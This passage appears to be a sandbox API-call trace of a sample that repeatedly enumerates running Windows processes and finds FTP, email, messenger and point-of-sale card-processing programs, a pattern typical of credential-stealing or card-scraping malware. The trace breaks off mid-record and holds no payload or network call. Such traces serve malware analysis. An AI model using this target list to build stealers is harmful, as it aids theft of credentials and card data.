lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0301.056] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.060] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.062] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0301.063] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.065] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0301.067] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0301.068] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0301.070] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0301.071] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0301.109] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0301.111] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0301.112] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0301.114] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0301.116] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0301.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0301.119] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0301.123] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0301.125] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0301.127] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0301.128] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0301.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0301.131] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0301.133] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0301.135] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0301.187] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0301.189] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0301.190] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0301.192] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0301.194] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0301.195] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0301.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0301.261] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0301.264] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0301.266] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0301.269] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0301.271] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0301.273] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0301.275] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0301.280] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0301.282] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0301.284] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0301.286] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0301.288] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0301.290] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0301.295] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0301.299] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0301.301] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0301.303] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0301.305] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0301.307] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0301.313] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0301.315] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0301.316] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0301.318] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0301.320] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0301.322] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0301.326] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0301.328] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0301.330] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0301.332] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0301.333] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0301.335] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0301.337] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0301.354] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0301.357] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0301.359] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0301.362] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0301.364] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0301.366] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0301.368] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0301.373] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.375] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0301.377] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0301.379] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0301.380] CloseHandle (hObject=0x21f8) returned 1 [0301.380] Sleep (dwMilliseconds=0x64) [0301.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0301.602] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.603] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.605] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.607] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.609] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.610] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.612] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.614] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.615] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: 